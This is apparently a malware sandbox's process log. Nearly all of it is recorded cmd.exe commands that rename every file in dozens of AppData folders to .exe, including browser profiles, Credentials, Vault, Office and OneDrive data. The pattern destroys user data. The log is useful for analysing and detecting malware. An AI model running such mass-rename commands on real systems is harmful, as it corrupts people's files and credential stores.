"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons Maskable\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons Monochrome\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons Maskable\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons Monochrome\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons Maskable\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons Monochrome\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons Maskable\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons Monochrome\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons Maskable\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons Monochrome\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\MediaFoundationWidevineCdm\x64\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Subresource Filter\Unindexed Rules\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Credentials\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Feeds\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\GameDVR\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\InputPersonalization\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Media Player\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Office\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\OneNote\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\PenWorkspace\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\PlayReady\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Vault\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows Sidebar\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\WindowsApps\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\CertificateRevocation\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\OriginTrials\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\RecoveryImproved\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Safe Browsing\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ShaderCache\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\SmartScreen\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Speech Recognition\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Subresource Filter\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\WidevineCdm\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ZxcvbnData\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\blob_storage\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\blob_storage\5e207bff-faf5-484b-bae4-88a2f18c6484\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm\index-dir\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Subresource Filter\Unindexed Rules\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\af-ZA\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\ar-AE\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\ar-BH\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\ar-DZ\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\ar-EG\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\ar-IQ\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\ar-JO\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\ar-KW\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\ar-LB\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\ar-LY\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\ar-MA\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\ar-OM\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\ar-QA\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\ar-SA\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\ar-SY\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\ar-TN\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\ar-YE\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\az-Latn-AZ\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\bg-BG\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\bn-BD\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\ca-ES\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\cs-CZ\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\da-DK\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\de-AT\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\de-CH\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\de-DE\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\de-LI\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\de-LU\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\el-GR\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\en-029\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\en-AU\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\en-BZ\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\en-CA\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\en-GB\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\en-HK\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\en-ID\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\en-IE\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\en-IN\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\en-JM\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\en-MY\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\en-NZ\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\en-SG\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\en-TT\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\en-ZA\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\en-ZW\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\es-419\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\es-AR\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\es-BO\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\es-CL\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\es-CO\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\es-CR\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\es-DO\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\es-EC\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\es-ES\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\es-GT\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\es-HN\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\es-MX\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\es-NI\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\es-PA\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\es-PE\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\es-PR\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\es-PY\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\es-SV\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\es-US\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\es-UY\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\es-VE\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\et-EE\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\eu-ES\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\fa-IR\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\fi-FI\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\fr-029\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\fr-BE\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\fr-CA\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\fr-CD\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\fr-CH\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\fr-CI\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\fr-CM\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\fr-FR\*.*" "*.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\fr-HT\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\fr-LU\*.*" "*.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\input\fr-MA\*.*" "*.exe"

C:\Windows\System32\cmd.exe

